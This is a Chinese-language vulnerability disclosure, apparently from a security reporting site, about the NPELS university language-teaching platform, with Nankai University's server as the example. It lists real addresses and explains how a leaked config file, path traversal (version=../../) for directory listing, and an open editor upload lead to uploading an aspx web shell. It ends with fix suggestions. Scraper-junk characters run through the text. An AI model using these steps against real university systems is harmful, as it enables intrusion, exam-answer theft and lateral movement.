好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中4 m9 b* @/ y, k
9 u9 h4 Z; ?* _: g; u) n详细说明:' f5 ]1 d8 W: o, I- r2 n
5 [8 D- z+ G& n) N1 D
以南开大学的为例: ' B# ^/ D' V2 a; j
http://222.30.60.3/NPELS
* r9 E8 S" @! K7 ^, Q( mNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址# C; Q+ D0 h1 l5 p: C$ }
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
8 O K' s& _- T F- a<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
9 H! j- |+ \) O</setting>
" ?7 o, U, X+ G及版本号
% t' X5 }! D$ i<add key="TVersion" value="1, 0, 0, 2187">
/ W$ O2 l+ G; t</add>8 a4 Q* W2 o) _- V' j" s% s3 A ?
直接访问5 D- F% b2 g! P
http://222.30.60.3/NPELS/CommonService.asmx
: e& G' ~$ k) |/ Z# l0 z使用GetTestClientFileList操作,直接 HTTP GET 列目录:
( U! I1 z$ u: `& Z8 e# {& Vhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187* g9 Q! X3 {( k. F+ @ b1 a
进一步列目录(返回的网页很大,可以直接 wget 下来)
: \3 T/ v) [3 h1 K& chttp://222.30.60.3/NPELS/CommonS ... List?version=../../& w. {8 j' K+ h
& m7 H$ g0 T r- N+ {; Z
发现5 A; \5 _0 y; n4 [
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
; M0 @+ W3 x; |2 q2 F4 p& K可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头$ `8 Z" n( U) ^" Q. s/ u" g
上传后继续列目录找到木马地址直接访问即可
, f W+ r6 ^7 _' L/ } & o% Y# f5 W& I: Z, ^3 \; k
OOXX. u* k7 m8 S. u$ u$ l- ~1 Z
* p; E u' F# U. K5 [7 ?
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法- P* o# X: _- O: E/ W# Y7 ~' Q# s
漏洞证明:
$ h5 }, ]& C, o8 D; F a) t! f. X
( T( M9 I/ u; C5 Y列目录:# y- v% P' p0 o, j* _! N
http://222.30.60.3/NPELS/CommonS ... List?version=../../
' [( Y' E- C+ ~, C8 p2 u+ ~( _( }1 e6 p文件上传:' M3 T, C, N# E* Y* c$ F& q' z' q
http://222.30.60.3/npelsv/editor/editor.htm6 P' V, w( O7 R( c4 u
! ?/ @5 O' Y ?7 x3 z上传木马:; I- q& D* G0 ?& C6 `
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
1 ?; ^4 S- I/ M' D ; [3 v8 q- y/ b
修复方案:
" |" A6 @% \2 c; M8 Z好像考试系统必须使用 CommonService.asmx
9 m( z0 X) ^/ D, d; F8 O最好配置文件加密或者用别的方式不让它泄露出来* B3 E+ w1 d6 a+ j- ^9 P
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
9 S% \- f8 }) ~6 j W9 C |